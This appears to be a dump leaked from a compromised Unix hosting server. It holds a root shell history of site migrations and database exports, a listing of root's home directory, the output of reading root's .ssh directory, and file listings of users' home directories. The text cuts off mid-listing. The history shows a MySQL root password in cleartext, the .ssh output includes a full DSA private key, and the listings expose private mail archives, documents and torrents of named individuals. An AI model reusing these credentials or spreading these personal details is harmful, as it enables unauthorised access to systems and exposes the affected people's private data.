../includes/ ls diff config.php config.php.new cd /export/www/ cd yourmom.sh ls cd misc/ ls ls cd /home/ventrilo/ ./ventrilo_status cd /export/www/yourmom.sh vi nerd.php3 unalias vi vi nerd.php3 cd /var/log/ ls ls -al rm httpd-access.log.1230* rm httpd-access.log.1231* df -h rm httpd-access.log.1232* df -h ls ls -al cd .. ls cd mail ls du -hs ls -al cd jcrossley rm jcrossley touch jcrossley chown jcrossley.jcrossley jcrossley chown jcrossley jcrossley chgrp jcrossley jcrossley ls -al df -h df -h vi /etc/mail/aliases unalias vi vi /etc/mail/aliases vi /etc/mail/virtusertable cd /etc/mail make cd /var/mail ls ls -al du -hs df -h cd ../log du -hs cd - ls ls -al cd .. ls -al df -h ls backups/ ls spool/ ls db/ ls msgs/ vi /usr/local/etc/php.ini unalias vi vi /usr/local/etc/php.ini apachectl graceful ls cd /export/www/ ls ls -al mkdir coreynewmanphoto.com chown coreynewmanphoto.com dire chown dire coreynewmanphoto.com chmod -R 777 coreynewmanphoto.com/ cd coreynewmanphoto.com/ vi index.html vi /usr/local/etc/apache22/httpd.conf apachectl graceful cd /home/dire/ ls ls -al ln -s coreynewmanphoto.com /export/www/coreynewmanphoto.com/ ls -l cd /export/www/ ls ls -al cd - ln -s /export/www/coreynewmanphoto.com/ coreynewmanphoto.com ls -al cd /home ls cd karin/ ls cd /export/www/ ls nslookup dreamhost.com nslookup ns1.dreamhost.com nslookup ns2.dreamhost.com nslookup ns3.dreamhost.com cd /home ls ls /export/www/ cd /export/www/ cd co cd coreynewmanphoto.com/ ls scp -r * dire at professorx.dreamhost.com:coreynewmanphoto.com/ scp -r * dire at professorx.dreamhost.com: sftp dire at professorx.dreamhost.com ls ls -al rm coreynewmanphoto.com ls cd ../jayzendesigns.com/ ls cd ../johnzentner.com/ ls cd ../lovebugknits.com/ ls -al cd LoveBug\ Site_files/ ls cd .. ls tar cvf lovebug.tar LoveBug\ Site_files cd /home/andyw/ ls scp -r * andeverwash at professorx.dreamhost.com: vi /etc/mail/virtusertable unalias vi vi /etc/mail/virtusertable nslookup ns1.dreamhost.com nslookup ns2.dreamhost.com nslookup ns3.dreamhost.com cd /export/www/yourmom.sh ls scp -r * ehampshire at professorx.dreamhost.com:yourmom.sh/ cat ~/.ssh/id_dsa.pub scp -r * ehampshire at professorx.dreamhost.com:yourmom.sh/ cd ../ehampshire.com/ scp -r * ehampshire at professorx.dreamhost.com:ehampshire.com/ cd ../lovebugknits.com/ ls cd ../jayzendesigns.com/ ls scp -r * jaymi at professorx.dreamhost.com:jayzendesigns.com/ scp -r * jaymi at professorx.dreamhost.com:jayzendesigns.com/ scp -r * jaymi at professorx.dreamhost.com: sftp jaymi at professorx.dreamhost.com cd ../lovebugknits.com/ ls sftp jenicole at professorx.dreamhost.com cd /home/ciagon/public_html/ ls scp -r * ehampshire at professorx.dreamhost.com:yourmom.sh/ciagon/ cd ../../dante/pu cd ../../dante/ ls cd /export/www/norcalparties.com/ ls sftp jcrossley2 at professorx.dreamhost.com mysql -u root -pfuck.mysql mysql -u root -pfuck.mysql df -h cd /export/www/roomwithamoose.com/ ls mysqldump --opt -Q -uroot -p vbulletin > vbulletin_db.sql ls cd closet ls cd .. cd .. ls cd zim ls scp -r * ehampshire at professorx.dreamhost.com:roomwithamoose.com/ cd ../roomwithamoose.com ls vi index.php unalias vi cat index.php scp index.php ehampshire at professorx.dreamhost.com:roomwithamoose.com/ cd ../ehampshire.com/magic/ ls cd .. scp -r magic ehampshire at professorx.dreamhost.com:roomwithamoose.com/ top cd /export/www/roomwithamoose.com/ scp -r * ehampshire at professorx.dreamhost.com:roomwithamoose.com/ cd /export/www/policethepolice.com ls cd .. tar czvf policethepolice.com.tgz policethepolice.com ln -s policethepolice.com.tgz /home/dire/ cd /home/dire/ ls -l chmod 777 policethepolice.com.tgz rm policethepolice.com.tgz ln -s /export/www/policethepolice.com.tgz . ls -l chmod 777 policethepolice.com.tgz cd public_html/ ls cd /export/www/coreynewmanphoto.com/ ls cd ../policethepolice.com ls find . |grep counter cd .. ls cd zim ls cd ../yourmom.sh ls find . |grep counter vi index.php3 unalias vi vi index.php3 vi top.php3 vi bottom.php3 cd ../policethepolice.com ls vi index.php.orig vi index.php vi ../counter.php3 mysqladmin -h mysqladmin --help mysqldump -h mysqldump --help mysqldump -uroot -pfuck.mysql counter > /tmp/counter_db.sql vi /tmp/counter_db.sql mysql -u counter_db -p -h mysql.yourmom.sh yourmom_counter_db < /tmp/counter_db.sql mysql -u counter_db -p -h mysql.yourmom.sh yourmom_counter_db < /tmp/counter_db.sql mysql -u counter_db -p -h mysql.yourmom.sh yourmom_counter_db < /tmp/counter_db.sql scp /tmp/counter_db.sql ehampshire at professorx.dreamhost.com: fg cd .. cp counter.php3 /home/dire/ cd /home/jaymi/public_html/photos/ ls cd .. tar zcvf jaymi_photos.tgz photos/ cd /export/www/ mkdir colo.pmjm.com chmod 777 colo.pmjm.com/ cd colo. cd colo.pmjm.com/ vi index.html unalias vi vi index.html vi /usr/local/etc/apache22/httpd.conf cd /usr/local/www/ ls ls cd data/ ls cd .. vi index.html fg apachectl graceful cd /export/www/ ls vi /usr/local/etc/apache22/httpd.conf apachectl graceful cd colo.pmjm.com/ ln -s /home/jaymi/public_html/jaymi_photos.tgz . ls vi index.html nslookup photos.jayzendesigns.com nslookup jayzendesigns.com nslookup 67.205.60.48 nslookup 208.97.187.239 cd /export/www/johnzentner.com/ ls scp -r index.html jaymi at professorx.dreamhost.com:johnzentner.com/ scp -r images jaymi at professorx.dreamhost.com:johnzentner.com/ %ls -la total 1016 drwxr-xr-x 7 root wheel 1024 May 10 07:08 . drwxr-xr-x 22 root wheel 1024 May 5 20:47 .. -rw------- 1 root wheel 108 Sep 28 2006 .Xauthority -rw------- 1 root wheel 8791 Jun 29 06:47 .bash_history -rw-r--r-- 1 root wheel 789 Oct 3 2006 .bashrc drwxr-xr-x 5 root wheel 512 Sep 4 2007 .bittorrent -rw-r--r-- 2 root wheel 786 Jul 22 2008 .cshrc -rw------- 1 root wheel 2217 Jul 13 15:34 .history -rw-r--r-- 1 root wheel 143 Nov 3 2005 .k5login -rw------- 1 root wheel 174 Feb 17 16:02 .lesshst -rw-r--r-- 1 root wheel 293 Nov 3 2005 .login -rw------- 1 root wheel 1396 Sep 5 2008 .lsof_pmjm -rw------- 1 root wheel 5872 May 10 07:08 .mysql_history -rw-r--r-- 2 root wheel 253 Jul 22 2008 .profile -rw------- 1 root wheel 1024 Feb 17 16:05 .rnd drwx------ 2 root wheel 512 Nov 6 2008 .ssh -rw-r--r-- 1 root wheel 36086 Jul 24 2008 logo-thelivingend.gif drwx------ 2 root wheel 512 Oct 9 2006 mail -rw-r--r-- 1 root wheel 80 Jul 24 2008 modules.txt -rw-r--r-- 1 root wheel 25008 Jul 22 2008 pkgs -rw-r--r-- 1 root wheel 10380 Jul 22 2008 portmaster-list -rw-r--r-- 1 root wheel 45 Jul 22 2008 ports-byhand -rw-r--r-- 1 root wheel 811 Sep 14 2007 queue-by-email.pl -rw-r--r-- 1 root wheel 811 Sep 14 2007 queue-by-from.pl -rw-r--r-- 1 root wheel 815 Sep 14 2007 queue.pl -rw-r--r-- 1 root wheel 1565 Sep 14 2007 remove-queue-by-email.pl drwxr-xr-x 2 root wheel 512 Jul 9 2008 ventrilo_srv -rw-r--r-- 1 root wheel 148042 Nov 14 2008 ventrilo_srv-3.0.2-FreeBSD-i386.tar.gz -rw-r--r-- 1 root wheel 208458 May 29 2008 ventrilo_srv-3.0.2-Linux-i386.tar.gz drwxr-xr-x 2 500 500 512 Nov 19 2007 ventsrv %cat .ssh/* ssh-dss AAAAB3NzaC1kc3MAAACBAPIdIVk8OzaPgMdWSWHwLAeuzGrXA3XUnmT/5AKqVOA2shN0f1hSZ9LNVmG aX4N/WLsVXkUIsL2aoq09Iq5HuCyqQGLdt4d64jOcNNtv+eRcIutSO4oEqu9/SmeeuXJ0bClyeLYvT9 WTD11tQYw3wv+WdOATd8T3EgJ06RMZfCDpAAAAFQDbmyaf4ZLGfBfqZww2dJxjeig+iQAAAIAVon040 L4PmVbd0K1bvJLhNGpjnvtYRK61AZgvSwsJzu3QPSmv+6d5/xIlKGTbtk/CfapWKktUPS4EProhko79 nyZsOYeK/rzQQqMabMVsl6p+HoJILOQDvdk4rFvSmZ3CrxC7PB19smPP+9/adUPFXH1bw6zVXbCda+t PAZ9+kQAAAIEA6/jKovlWI5862/bfnBoeFcVAF0L8H3ACdNfIp5AJZxJjp44eJFdVpLduZToc+NXXmJ FtPc31JBWSd43HLyK3VpVMymOjxJ2Z7ec4dnAjQymQQ6RxQrXy/bxtG3uyLT/SlDhg+HYKa2gIWiDyO 7he3kS/Iq1PNXn3SJPyjItIc08= root at mail.pmjm.net ssh-dss AAAAB3NzaC1kc3MAAACBAOHD2a5BTbjF0ZgdPJDvdHBF8mPUUm9xsZ0x6lLn1bxp1tgZecaBlRVFY72 zT81wMDQ4vHsPv7KGkX6+CTu/cAFrCLQesU6g2IRbzQwDSsD10GxUMwX9CPONWpNgF7qeZwWK7UhaIL qEsIyKy36lkPuQRd0N9AlJURBhsyT15Sh5AAAAFQC52vI+Ivva/7ZAu4pIw7E7Ow6C5QAAAIEA05nnL BvwleDrFul39TWVL1KZGewJCy7zQfynJvdB1T43v0VTpNOFXKga+TyawniW38uYQWOWiygpR/wgOosk /8GGiqolXPAy6ft28sn1pa4nYVD31UXHYYLSCWpX/egm4ftD+gI8hDNs+vKLhbnca+5jygzusxz5RPa FUDzbsBkAAACBAJHFjq2ledzJSTcg1RPMd599CY8cMlEIP2EHgSOugE2brTWkxZGSwTjkzxzEnebEHc aHXUCEsFERY8uJ24mWdaZuKNT/+Renr/771ygWKPP6KOcS+sRtljdG/rplGmbEDyXZB4+ppf5bEnaGg 0/eoYIJtJjxI7PXGI1wW41Vtde4 ehampshi at yourmom.cisco.com ssh-dss AAAAB3NzaC1kc3MAAACBAJ5aBFavFNEIO/0Ut0dp5a/tPd3RevxwhvEn1fmzEtKntlhq56CAGrCrOgO 3VmrLBVGiZJf1+xTziJxj0pOJdigOj4SYSFuVeRcgh6vv28gf7yOJ+l+liwcZKepV0c53riV/FgODXc 8QzkLHMb74IjEGKxwA/LZyge51vh2N8VOxAAAAFQCmy5hpwf74M7J0BgXxPKj6C3xQAwAAAIAvPjmgf GN5VkMBObu/wX8Y2WzDEzKDXqS+GNQHhc/baH8ui1kl6pAqlXWznY1TA7sjFW9+TGFXnEM+UfB2dWmJ RJX5BGpJ3Yvq5CtbW0pwu+FOwOKtg5wYSYuNgmfrujvcXVsAsvmdpMwowAhbD7ke6G98aGjdGPAfPv7 v2FM8jwAAAIEAkokWe8uvkEMVRTxuWN28l3+ZGCTrKCPg3/OJbBaoPdjz5J2b2A0Fwln5pfpLg+3UDW 6GCRNImS/S00VBwH857COYtjzygZwm1d7gFbU9kCiKCVsLvv+ze+9DFLVqwbJcASLPRVyC/8G6oTWq3 hpumFPxJ3dyyYrKYRTxNIgv9Cg= root at yourmom.dhs.org ssh-dss AAAAB3NzaC1kc3MAAACBAMxINpxOYd8h/Wvj73sRIWDH4Ed3lCzRhI6Wvms6vw8NIyp6mfbXye+2aMw Pso4n9gT76C8ocoU/uowL46INmyQAvk0bhSXD6Mto/HO2eHGxNvCyRP5wlKW168DD/xhNtFeexJfBlI B+HmgUGtjD5mFQknjxB8sNqoZvLgyRie9jAAAAFQDDzZGZxx+zgvEam5G4ams6Vvd+gwAAAIEAyWEtB FrAhSh9G9QqN7AwUZyAh2N/CwBifEuhJcIoy9NKPijlTtlafRJQd1DdATCuFHvrggC304EGXUC4/dSk wY+uaWwy/+85TbKCuwC4IbvFqkEWF+mZ0tG/2Zx/hRQY9+766iPTa1tUrCocqRzErCa7iB6Kp40D/cU R0bvi7HwAAACBALzDvjEz55xnPnLz9lKg5h6hedN28KocEzG/2kgWbepFv/pO8zhPryMYS4t+Ve7+Ns 5ohGdR1TOP8yw6Zuq3uSRBiXvOFbVy8feh8ZpbxYpRTZWCOd+vzSPQwJLqjFZdOaMVurbwECNinau7B K1xxb1H90GVoPlO6rWQF4uSC6yg root at bsd.yourmom.dhs.org ssh-dss AAAAB3NzaC1kc3MAAACBAIde1/OdSV0PlVBQMg1hu0ViHg7MdK8vzYN/ZsqF45Imc6Xov6P7+nTh3/l TbAcE+rF81/m/rxazLfFx3jHIvzvMru2cLAg8YrGnrAnFwR8dniglzPf4sJJqc0mOh4iLZv9LzPzjxg Q68VtfQ0wjWltPJ2i7EZmp1S75u23dm9snAAAAFQCLkkbU/P0946kdI0ldQd1OvtEdAQAAAIEAhCzM9 zDXdVoAXKYtU4iXy1MeEz/00HcfIpmzLfEN3tgSpycg0FP3/box1SKebDxymUPTw4PQ03PxMH4sQKpy 1rG5uXT01IQAoyvlVOfa9dQTuPzTEeKCPVY9cFF3Ft/uOzMhDedoB+OSomPDBiSqDft34mhhvn3T7bC GCwb/No8AAACABtgyhSRBJIW+lJmlqCAAGYmdfNExPU64WEJ4nMB5U5Y2tbsZN1ZzMe0RoktjSuvBEn O9SXZDtaRRLmVJwqo3LU16lx9YUhS6LpsdBTwHADfcO29Ti346vvTTcQrMf9bAG35lWmteUdvx79B2U dZNccka63bOGHBMykX9kSwL6W0= root at pmjm ssh-dss AAAAB3NzaC1kc3MAAACBANZz1pGeGxfi1hn6seIFHQI+8rq+B/ZIE/1IJ03Rz6MZRD49hKZIw3g/WH+ F+2lrGraSXJl5MPyr5Ig+ZoBKvPV91sRYwxkhqxvlhI6a+l/wG/jeFzA/G4nMipw3hjEyC7jRFU2UAi tAp/EAznbBOyPFFRcMLbQx85r3QenszEEpAAAAFQDGLWOj9IAc0Kbd2KqcC1eOES3AVQAAAIAK1xdhe X58yhJIDIhICsn+NNvgk4NB+XcXVUeHb/qsLwh63JK4xaVqlO5yeJ0oLET+Krr3W0nXXjFV77FTEMet JFub7cIPwAyN5l1Gq1hK6VUvbqEHwUkLmXORpZgccXRaGTlcDcoZtrNebRO5hjQ+ZHn+qhOpWk1/OVl ef/gWuQAAAIA1yiO2pF2DwCtbns1HGW+UyHQSZPcZxf2JfFoBGvJkUWt4tSJ2VP+kDbMwoEHZlXcXtt Idh81FZkYLKN87xsanO6ALTsfAtl34sdvGFZu0JKHjhZ1Z9s5iQq1fdbsRPMMKStLF2g2oUaxag+hnU +nVUo7U7oY9vqQ7YHcHiZZ4WA== root at mail.pmjm.net -----BEGIN DSA PRIVATE KEY----- MIIBuwIBAAKBgQCHXtfznUldD5VQUDINYbtFYh4OzHSvL82Df2bKheOSJnOl6L+j +/p04d/5U2wHBPqxfNf5v68Wsy3xcd4xyL87zK7tnCwIPGKxp6wJxcEfHZ4oJcz3 +LCSanNJjoeIi2b/S8z848YEOvFbX0NMI1pbTydouxGZqdUu+btt3ZvbJwIVAIuS RtT8/T3jqR0jSV1B3U6+0R0BAoGBAIQszPcw13VaAFymLVOIl8tTHhM/9NB3HyKZ sy3xDd7YEqcnINBT9/26MdUinmw8cplD08OD0NNz8TB+LECqctaxubl09NSEAKMr 5VTn2vXUE7j80xHigj1WPXBRdxbf7jszIQ3naAfjkqJjwwYkqg37d+JoYb590+2w hgsG/zaPAoGABtgyhSRBJIW+lJmlqCAAGYmdfNExPU64WEJ4nMB5U5Y2tbsZN1Zz Me0RoktjSuvBEnO9SXZDtaRRLmVJwqo3LU16lx9YUhS6LpsdBTwHADfcO29Ti346 vvTTcQrMf9bAG35lWmteUdvx79B2UdZNccka63bOGHBMykX9kSwL6W0CFDbp33kB xw6DxCinOr0mvqMUhGOT -----END DSA PRIVATE KEY----- ssh-dss AAAAB3NzaC1kc3MAAACBAIde1/OdSV0PlVBQMg1hu0ViHg7MdK8vzYN/ZsqF45Imc6Xov6P7+nTh3/l TbAcE+rF81/m/rxazLfFx3jHIvzvMru2cLAg8YrGnrAnFwR8dniglzPf4sJJqc0mOh4iLZv9LzPzjxg Q68VtfQ0wjWltPJ2i7EZmp1S75u23dm9snAAAAFQCLkkbU/P0946kdI0ldQd1OvtEdAQAAAIEAhCzM9 zDXdVoAXKYtU4iXy1MeEz/00HcfIpmzLfEN3tgSpycg0FP3/box1SKebDxymUPTw4PQ03PxMH4sQKpy 1rG5uXT01IQAoyvlVOfa9dQTuPzTEeKCPVY9cFF3Ft/uOzMhDedoB+OSomPDBiSqDft34mhhvn3T7bC GCwb/No8AAACABtgyhSRBJIW+lJmlqCAAGYmdfNExPU64WEJ4nMB5U5Y2tbsZN1ZzMe0RoktjSuvBEn O9SXZDtaRRLmVJwqo3LU16lx9YUhS6LpsdBTwHADfcO29Ti346vvTTcQrMf9bAG35lWmteUdvx79B2U dZNccka63bOGHBMykX9kSwL6W0= root at central.int.pmjm.org pmjm.com ssh-dss AAAAB3NzaC1kc3MAAACBALGVYHAJYr0DR4QX2YLhARTk0WW8HVnnR1xOIC6JeZbk89CM5F6P8VJKq2a hMkmGQkIqZtVvdmvjmfhxaTUS8lXtCM5rLO94yz7bgMrWtaoZTXCnEA1aBzhW3YMD/2ByPlJU2lO0Qe h09HFgIAquSYbCEYFE5lGVP5LTT5W1Y8SlAAAAFQC7x95hEymD5hB3jY+1zD6DfWcX5QAAAIBnqp1PQ WU0E3SiYzKB6lKqYm9rzh8ogkHcN6mBpW0kODNETt0xW5vXhE5hP83qX9ZF4WpCl6TSdmI72h8hOq48 jhUzqhuoqGepFYXlDUTK4LxzD77YRB2lohP+/eVkLKmzv5IevbOzAJFU98E207u9nIZnnYtEbRYy8oS khLbrDQAAAIEApkzPne/BmYH9h8pW0YAVxu4uM1j4QjsS0UrytJYPQKmPCgxUoypI/LYFB1yqZ1pzFw AjBhXUFENQuJ/Lmf8smtyt+ETUrUSsakPtEOuNq5+SHHXsyGNERDm455Su+cMu2+W4+/36Kq53TAYN7 YtggKFrh6DcqEl8rELCK6ytlYc= old.pmjm.com ssh-dss AAAAB3NzaC1kc3MAAACBALGVYHAJYr0DR4QX2YLhARTk0WW8HVnnR1xOIC6JeZbk89CM5F6P8VJKq2a hMkmGQkIqZtVvdmvjmfhxaTUS8lXtCM5rLO94yz7bgMrWtaoZTXCnEA1aBzhW3YMD/2ByPlJU2lO0Qe h09HFgIAquSYbCEYFE5lGVP5LTT5W1Y8SlAAAAFQC7x95hEymD5hB3jY+1zD6DfWcX5QAAAIBnqp1PQ WU0E3SiYzKB6lKqYm9rzh8ogkHcN6mBpW0kODNETt0xW5vXhE5hP83qX9ZF4WpCl6TSdmI72h8hOq48 jhUzqhuoqGepFYXlDUTK4LxzD77YRB2lohP+/eVkLKmzv5IevbOzAJFU98E207u9nIZnnYtEbRYy8oS khLbrDQAAAIEApkzPne/BmYH9h8pW0YAVxu4uM1j4QjsS0UrytJYPQKmPCgxUoypI/LYFB1yqZ1pzFw AjBhXUFENQuJ/Lmf8smtyt+ETUrUSsakPtEOuNq5+SHHXsyGNERDm455Su+cMu2+W4+/36Kq53TAYN7 YtggKFrh6DcqEl8rELCK6ytlYc= ssh.cisco.com ssh-dss AAAAB3NzaC1kc3MAAACBAKi4nala0B/u0CNGzXwfMmBUFmYkQStxKnVWEmArrLhPA2dxcIFLJd9NjbY e6Hzv6p6EwuCCFxqzz3wqzeagKXJonkUTOSwgRNlGuGiLQzEP5q4+mchsCQhv5tQqPqC+nwfSoRBLar fJYBew5Q5c7/J1E6g+/1YV+D6qjzB2L1HxAAAAFQC2W5o6EsnZGRoQC5ysAy1rgMc8qQAAAIB71JCO4 4AenIwidqFEMi034zxtIdwZYy40yDL83+qjkw9LsbPTpOVy+Pt6j7nr2OP9/mKLHWMNxnC03qmCc6e6 4/ELeXMVMpSvr15neOchVNHmFk6OZwJQ2KS1iaWUU8E7h/a/+CgARMRDdznltZlGLdQhB8AxiP+M4ah sPJqXvwAAAIATBntMqCjj8p6lNZKAiOImumrdk3FvTcEckaOw8pZxbk4V4CKxwTbjhVczuseSS2GjVR C4ZgU0jStWdTrKE/5KEEwhcw8b7X3DxO2ooJVrLRopgEKCg4uMxdbo7yJZSH/gqhRcpXQtwNOAxzCnx n8YsTN3HnBx2tVAyiR4hDQP6Q== [216.127.35.68]:443 ssh-dss AAAAB3NzaC1kc3MAAACBALVkZMTCjqiXbe7p07TTYRGEI9aLy2LuX2I1l0CTPqHIkY31k0zJVW85EKl Dv4EXx8WISzb+u2/QTVplyU6nevvxjdWbCr7STwu/waP5RnVdGw0JgonJd8JIup6OM705/GFeXliOl4 fOEkrjdvXPtMSVJ4MAotPCguLNxQZrY7WZAAAAFQDMPIQKwOkpUw/EoyciAjs/M5asfwAAAIBbBuLNO 1fYr3FQvpnSPBSHgfK5X+RoLNMGA0vpohjW/gGH79c4h0qq/pzGhYulZJotJKwyKM5p+jGfTz4bkU4o OqXGpDnM+0R5LsyUFCTppMu8pgMGLiU+71dgTgOaCF4E3FA2crnaTvTEbb2g4ijuiNrmUrIbkZRv8RC 03ruWDgAAAIEAiadT7a0nFG9Vmf7EDvAWi+/69HcIYUfqZcCt1XipKiwSFBvfvg2c7AUlwEB+kF5iCo j7AygIKFiH4wczj372k47oJV2UBvtk8SIpZusQURWKOmadwPr3Vno3fh8tP41gj2X94fIHhth3JNv+8 /jRBk5sTalZaNyjg4Im7aqmsIA= professorx.dreamhost.com,67.205.61.213 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA6P9Hlwdahh250jGZYKg2snRq2j2lFJVdKSHyxqbJiVy9VX9gTkN 3K2MD48qyrYLYOyGs3vTttyUk+cK++JMzURWsrP4piby7LpeOT+3Iq8CQNj4gXZdcH9w15Vuk2qS11a t6IsQPVHpKD9HGg9//EFUccI/4w06k4XXLm/IxOGUwj6I2AeWmEOL3aDi+fe07TTosSdLUD6INtR0cy Ksg0zC7Da24ixoShT8Oy3x2MpR7CY3PQ1pUVmvPkr79VeA+4qV9F1JM09WdboAMZgWQZ+XrbtuBlGsy hpUHSCQOya+kOJ+bYryS+U7A+6nmTW3C9FX4FgFqTF89UHOC7V0zZQ== %cd /home %ls -la total 144 drwxr-xr-x 33 root wheel 1024 Jul 13 14:24 . drwxr-xr-x 24 root wheel 512 Jul 23 2008 .. drwxr-xr-x 3 admin admin 512 May 28 2004 admin drwxr-xr-x 8 andyw andy 1024 Sep 4 2006 andyw drwxr-xr-x 2 bmondala bmondala 512 Mar 20 2008 bmondala drwxr-xr-x 2 bre bre 512 Aug 19 2007 bre drwxr-xr-x 7 1016 ciagon 1024 Aug 21 2006 ciagon drwxr-xr-x 3 crystal crystal 512 Mar 21 09:33 crystal drwxr-xr-x 3 d d 512 May 10 12:11 d drwxr-xr-x 2 dakami dakami 512 May 10 11:57 dakami drwxr-xr-x 2 dante dante 512 May 21 2005 dante drwxr-xr-x 3 dire dire 512 May 11 09:39 dire drwxr-xr-x 2 dmktest dmktest 512 Apr 25 2006 dmktest drwx------ 68 effugas wheel 5120 Jul 17 11:43 effugas drwxr-xr-x 42 1009 effugas_nr 2560 Jun 29 12:26 effugas_nr drwxr-xr-x 6 ginray ginray 1024 Feb 11 2006 ginray drwxr-xr-x 4 gir wheel 512 Sep 1 2008 gir drwxr-xr-x 7 hampshir hampshir 512 Sep 14 2007 hampshir drwxr-xr-x 6 ice wheel 1024 Jul 17 09:18 ice drwxr-xr-x 3 jay jay 512 Aug 16 2006 jay drwxr-xr-x 3 jaymi jaymi 512 Nov 12 2008 jaymi drwxr-xr-x 6 mooseaccess jb 512 Apr 6 2004 jb drwxr-xr-x 7 jcrossley jcrossley 1024 Mar 2 09:30 jcrossley drwxr-xr-x 2 jeff jeff 512 May 12 2006 jeff drwxr-xr-x 3 jenicole jenicole 512 Jan 30 2008 jenicole drwxr-x--x 14 jmondala jmondala 2048 Jul 20 00:01 jmondala drwx------ 15 karin karin 1536 Apr 21 2008 karin drwxr-xr-x 2 mooseaccess wheel 512 Oct 7 2008 mooseaccess drwxr-xr-x 4 pig pig 512 May 9 14:59 pig drwxr-x--- 7 psm pmjm 1536 Jul 13 15:34 psm drwxr-xr-x 7 tom tom 1024 May 17 2006 tom drwxr-xr-x 3 tomstdenis tomstdenis 512 Feb 20 2006 tomstdenis drwxr-xr-x 4 ventrilo ventrilo 512 Nov 14 2008 ventrilo %cd effugas %ls -la total 7437192 -rw-r--r-- 1 effugas wheel 53 Mar 10 2005 +COMMENT -rw-r--r-- 1 effugas wheel 490 Mar 10 2005 +CONTENTS -rw-r--r-- 1 effugas wheel 307 Mar 10 2005 +DESC -r--r--r-- 1 effugas wheel 13080 Mar 10 2005 +MTREE_DIRS -rw-r--r-- 1 effugas wheel 1299747 Jul 16 2005 - -rw-r--r-- 1 effugas wheel 0 Sep 28 2005 -u drwx------ 68 effugas wheel 5120 Jul 17 11:43 . drwxr-xr-x 33 root wheel 1024 Jul 13 14:24 .. -rw------- 1 effugas wheel 434 Jan 13 2008 .Xauthority -rw-r--r-- 1 effugas wheel 0 Oct 24 2006 .addressbook -rw------- 1 effugas wheel 2285 Oct 24 2006 .addressbook.lu -rw------- 1 effugas wheel 12839 Jul 18 06:18 .bash_history drwxr-xr-x 7 effugas wheel 512 Jun 13 2008 .bittorrent drwxr-xr-x 6 effugas wheel 512 Feb 6 14:05 .cpan drwx------ 2 effugas wheel 512 Apr 23 2005 .elinks drwx------ 2 effugas jb 512 Sep 24 2005 .elm -rw-r--r-- 1 effugas wheel 63520 Sep 29 2005 .fonts.cache-1 drwx------ 4 effugas wheel 512 Feb 15 2006 .gaim drwx------ 2 effugas wheel 512 Mar 19 00:41 .gnupg -rw------- 1 effugas wheel 302298 Dec 30 2005 .grepmail-cache -rw------- 1 effugas wheel 67 Jul 6 2008 .lesshst -rw-r--r-- 1 effugas wheel 133 Jun 10 2006 .mailboxlist -rw------- 1 effugas wheel 7465 Jun 3 06:23 .mysql_history -rw------- 1 effugas wheel 221 Sep 10 2004 .nessusrc -rw-r--r-- 1 effugas wheel 28672 Sep 2 2004 .nomde_ex.pl.swo -rw-r--r-- 1 effugas wheel 16384 Sep 7 2004 .nomde_ex.pl.swp drwx------ 8 effugas wheel 512 Dec 5 2005 .openwebmail -rw------- 1 effugas wheel 1592 Apr 20 19:28 .pine-interrupted-mail -rw------- 1 effugas wheel 17165 Jul 17 11:38 .pinerc -rw-r--r-- 1 effugas wheel 816 Jan 8 2006 .procmailrc -rw------- 1 effugas wheel 1024 Jan 7 2009 .rnd -rw-r--r-- 1 effugas wheel 12 Apr 4 2005 .slirprc drwx------ 2 effugas wheel 512 Jul 12 14:02 .spamassassin drwxr-xr-x 2 effugas wheel 512 Nov 9 2005 .ssh drwxr-xr-x 3 effugas wheel 512 Jun 23 2007 .subversion -rw------- 1 effugas jb 256 Dec 5 2005 .vacation.msg drwxr-xr-x 2 effugas wheel 512 Sep 29 2005 .vnc -rw-r--r-- 1 effugas wheel 5714 Sep 5 2007 110eclipse.jpg -rw-r--r-- 1 effugas wheel 5714 Sep 5 2007 110eclipse.jpg.1 -rw-r--r-- 1 effugas wheel 4170702 Dec 17 2006 17-Day tripper.mp3 -rw-r--r-- 1 effugas wheel 18163 Oct 10 2006 399299 drwx------ 11 effugas wheel 2048 Jan 14 2007 4 -rw------- 1 effugas wheel 1244999 Jul 25 2005 Admin Noise -rwx------ 1 effugas wheel 19253 May 20 2007 Alpha Man Conversation & Persuasion.torrent drwxr-xr-x 7 effugas wheel 512 Jun 14 2008 BitTorrent Downloads drwxr-xr-x 11 root wheel 1024 Jan 13 2007 BitTorrent-4.20.9 -rw------- 1 effugas wheel 9215553 Aug 12 2006 CCCP -rw-r--r-- 1 effugas wheel 136192 Aug 12 2007 Cingular_Customized APN info and price sheet.doc -rw------- 1 effugas wheel 11072756 Sep 15 2006 Crypto -rwx------ 1 effugas wheel 18865 Nov 4 2006 David X Seduction and Relationships Seminar.torrent -rw-r--r-- 1 effugas wheel 64512 Jan 6 2006 DiogeNeS.doc -rw-r--r-- 1 effugas wheel 27648 May 10 13:01 Doxpara-NDT term sheet.doc -rw------- 1 effugas wheel 425406 Jul 25 2005 Drafts -rw-r--r-- 1 effugas wheel 27648 Aug 12 2007 Encryption sw_SecurStar info.doc lrwxr-xr-x 1 effugas wheel 29 Jan 8 2006 Funsec -> /usr/home/effugas/mail/Funsec -rw------- 1 effugas mail 10369669 Sep 25 2005 Gap -rw------- 1 effugas wheel 496 Sep 30 2005 INBOX.Drafts -rw------- 1 effugas wheel 324536 Nov 18 2005 INBOX.Sent -rw------- 1 effugas wheel 496 Sep 30 2005 INBOX.Trash -rwx------ 1 effugas wheel 20767 Oct 24 2006 Juggler - Charisma Arts Bootcamp.avi.torrent -rw-r--r-- 1 effugas wheel 403486571 Jul 13 2006 Junk -rw-r--r-- 1 effugas wheel 379402660 Nov 17 2005 Junk_toobig -rw------- 1 effugas wheel 280301055 Aug 21 2006 Known drwxr-xr-x 2 effugas wheel 512 Sep 26 2005 MT-3.2-en_US -rwx------ 1 effugas wheel 1377924 Sep 26 2005 MT-3.2.tar.gz drwxrwxrwx 2 effugas jb 512 Sep 24 2005 Mail -rw-r--r-- 1 effugas wheel 1438 Oct 4 2006 Makefile -rw------- 1 effugas wheel 229972323 Sep 21 2006 Older Mail -rw------- 1 effugas wheel 181797360 Jul 25 2005 Orig_Older -rw------- 1 effugas wheel 492 Jul 25 2005 Outbox -rw-r--r-- 1 effugas wheel 200578 Aug 12 2007 PhoneCrypt_docs_pc.pdf -rwx------ 1 effugas wheel 28554 Nov 18 2006 PickUp 101 - He Said, She Said - Volume 1.torrent drwxr-xr-x 2 effugas wheel 512 Oct 2 2005 PyFlickrUploadr -rw-r--r-- 1 effugas wheel 7164 Oct 2 2005 PyFlickrUploadr.tar.gz lrwxr-xr-x 1 effugas wheel 31 Jan 8 2006 RouteSec -> 